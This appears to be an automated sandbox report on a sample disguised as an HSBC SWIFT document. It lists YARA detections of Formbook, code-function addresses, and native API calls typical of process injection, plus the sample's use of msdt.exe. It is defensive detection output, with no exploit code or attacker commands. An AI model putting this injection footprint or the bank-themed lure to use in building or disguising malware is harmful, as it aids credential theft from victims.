          Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: HSBC_SWIFT-20-11-2021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_00C0765F0_2_00C0765F
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_00C077150_2_00C07715
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_00C05C240_2_00C05C24
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_017282500_2_01728250
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_0172D2E80_2_0172D2E8
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_057890720_2_05789072
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_05785A770_2_05785A77
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_05785AB00_2_05785AB0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0040102B8_2_0040102B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004010308_2_00401030
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004161D98_2_004161D9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0041B9918_2_0041B991
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0041CBDA8_2_0041CBDA
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00408C6C8_2_00408C6C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00408C708_2_00408C70
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0041BDC48_2_0041BDC4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0041C5F78_2_0041C5F7
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00402D878_2_00402D87
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00402D908_2_00402D90
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00402FB08_2_00402FB0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00EA5C248_2_00EA5C24
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00EA765F8_2_00EA765F
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00EA77158_2_00EA7715
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189F9008_2_0189F900
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B41208_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AB0908_2_018AB090
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C20A08_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019620A88_2_019620A8
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019628EC8_2_019628EC
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019510028_2_01951002
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196E8248_2_0196E824
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA8308_2_018BA830
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CEBB08_2_018CEBB0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195DBD28_2_0195DBD2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019503DA8_2_019503DA
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01962B288_2_01962B28
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BAB408_2_018BAB40
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019622AE8_2_019622AE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194FA2B8_2_0194FA2B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C25818_2_018C2581
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019625DD8_2_019625DD
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AD5E08_2_018AD5E0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01962D078_2_01962D07
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01890D208_2_01890D20
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01961D558_2_01961D55
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A841F8_2_018A841F
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195D4668_2_0195D466
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196DFCE8_2_0196DFCE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01961FF18_2_01961FF1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01962EF78_2_01962EF7
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195D6168_2_0195D616
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B6E308_2_018B6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E1D5520_2_054E1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E2D0720_2_054E2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05410D2020_2_05410D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E25DD20_2_054E25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542D5E020_2_0542D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544258120_2_05442581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DD46620_2_054DD466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542841F20_2_0542841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054EDFCE20_2_054EDFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E1FF120_2_054E1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DD61620_2_054DD616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05436E3020_2_05436E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E2EF720_2_054E2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541F90020_2_0541F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543412020_2_05434120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D100220_2_054D1002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054EE82420_2_054EE824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543A83020_2_0543A830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E28EC20_2_054E28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542B09020_2_0542B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054420A020_2_054420A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E20A820_2_054E20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543AB4020_2_0543AB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E2B2820_2_054E2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D03DA20_2_054D03DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DDBD220_2_054DDBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544EBB020_2_0544EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054CFA2B20_2_054CFA2B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E22AE20_2_054E22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E461D920_2_00E461D9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E4B99120_2_00E4B991
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E4CBDA20_2_00E4CBDA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E38C6C20_2_00E38C6C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E38C7020_2_00E38C70
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E4C5F020_2_00E4C5F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E32D8720_2_00E32D87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E32D9020_2_00E32D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E32FB020_2_00E32FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0541B150 appears 66 times
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: String function: 0189B150 appears 54 times
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004185D0 NtCreateFile,8_2_004185D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00418680 NtReadFile,8_2_00418680
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00418700 NtClose,8_2_00418700
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004187B0 NtAllocateVirtualMemory,8_2_004187B0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004186FB NtClose,8_2_004186FB
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004187AA NtAllocateVirtualMemory,8_2_004187AA
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D99A0 NtCreateSection,LdrInitializeThunk,8_2_018D99A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_018D9910
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk,8_2_018D98F0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9840 NtDelayExecution,LdrInitializeThunk,8_2_018D9840
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk,8_2_018D9860
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk,8_2_018D9A00
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A20 NtResumeThread,LdrInitializeThunk,8_2_018D9A20
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A50 NtCreateFile,LdrInitializeThunk,8_2_018D9A50
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D95D0 NtClose,LdrInitializeThunk,8_2_018D95D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9540 NtReadFile,LdrInitializeThunk,8_2_018D9540
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9780 NtMapViewOfSection,LdrInitializeThunk,8_2_018D9780
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,8_2_018D97A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9FE0 NtCreateMutant,LdrInitializeThunk,8_2_018D9FE0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9710 NtQueryInformationToken,LdrInitializeThunk,8_2_018D9710
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_018D96E0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_018D9660
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D99D0 NtCreateProcessEx,8_2_018D99D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9950 NtQueueApcThread,8_2_018D9950
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D98A0 NtWriteVirtualMemory,8_2_018D98A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9820 NtEnumerateKey,8_2_018D9820
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DB040 NtSuspendThread,8_2_018DB040
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DA3B0 NtGetContextThread,8_2_018DA3B0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9B00 NtSetValueKey,8_2_018D9B00
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A80 NtOpenDirectoryObject,8_2_018D9A80
